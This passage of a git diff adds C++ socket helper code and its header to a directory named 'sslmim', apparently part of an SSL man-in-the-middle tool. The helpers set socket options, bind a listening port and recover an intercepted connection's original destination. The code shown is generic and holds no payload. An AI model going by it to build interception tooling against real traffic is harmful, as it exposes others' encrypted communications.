+#include <netinet/tcp.h>
+#include <string.h>
+#include <string>
+#include <errno.h>
+
+#include "socket.h"
+
+namespace NS_Socket {
+
+string error;
+
+const char *why()
+{
+        return error.c_str();
+}
+
+// disable Mr. Nagle's algorithm
+int nodelay(int sock)
+{
+        int one = 1;
+        socklen_t len = sizeof(one);
+
+        if (setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, &one, len) < 0) {
+                error = "NS_Socket::nodelay::setsockopt: ";
+                error += strerror(errno);
+                return -1;
+        }
+
+        return 0;
+}
+
+// make socket ready for port-reuse
+int reuse(int sock)
+{
+        int one = 1;
+        socklen_t len = sizeof(one);
+
+        if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &one, len) < 0) {
+                error = "NS_Socket::reuse::setsockopt: ";
+                error += strerror(errno);
+                return -1;
+        }
+
+        return 0;
+}
+
+#ifdef FREEBSD
+#define LINUX22
+#endif
+
+// obtain real destination of connection
+int dstaddr(int sock, sockaddr_in *dst)
+{
+        if (!dst) {
+                error = "NS_Socket::dstaddr: dst == NULL";
+                return -1;
+        }
+
+#ifdef LINUX22
+        socklen_t size = sizeof(sockaddr_in);
+        if (getsockname(sock, (struct sockaddr*)dst, &size) < 0) {
+                error = "NS_Socket::dstaddr::getsockname: ";
+                error += strerror(errno);
+                return -1;
+        }
+#elif defined(LINUX24)
+#include <linux/netfilter_ipv4.h>
+        socklen_t size = sizeof(sockaddr_in);
+        if (getsockopt(sock, SOL_IP, SO_ORIGINAL_DST, dst, &size) < 0) {
+                error = "NS_Socket::dstaddr::getsockopt: ";
+                error += strerror(errno);
+                return -1;
+        }
+#else
+#error "Not supported on this OS yet."
+#endif
+        return 0;
+}
+
+int bind_local(int sock, int port, bool do_listen)
+{
+        struct sockaddr_in saddr;
+
+        memset(&saddr, 0, sizeof(saddr));
+
+        saddr.sin_port = htons(port);
+        saddr.sin_family = AF_INET;
+
+        if (reuse(sock) < 0)
+                return -1;
+
+        if (bind(sock, (struct sockaddr*)&saddr, sizeof(saddr)) < 0) {
+                error = "NS_Socket::bind_local::bind: ";
+                error += strerror(errno);
+                return -1;
+        }
+
+        if (do_listen) {
+                if (listen(sock, SOMAXCONN) < 0) {
+                        error = "NS_Socket::bind_local::listen: ";
+                        error += strerror(errno);
+                        return -1;
+                }
+        }
+        return 0;
+}
+
+
+}; // namespace
diff --git a/other/sslmim/socket.h b/other/sslmim/socket.h
new file mode 100644
index 0000000..e0fad4e
--- /dev/null
+++ b/other/sslmim/socket.h
@@ -0,0 +1,55 @@
+/*
+ * Copyright (C) 2001 Sebastian Krahmer.
+ * All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *      This product includes software developed by Sebastian Krahmer.
+ * 4. The name Sebastian Krahmer may not be used to endorse or promote
+ *    products derived from this software without specific prior written
+ *    permission.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
+ * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ */
+#ifndef _MY_SOCKET_H_
+#define _MY_SOCKET_H_
+
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+namespace NS_Socket {
+
+const char *why();
+
+int nodelay(int sock);
+
+int reuse(int sock);
+
+int dstaddr(int sock, sockaddr_in *dst);
+
+int bind_local(int sock, int port, bool do_listen);
+
+
+}; // namespace
+
+#endif // _MY_SOCKET_H_
+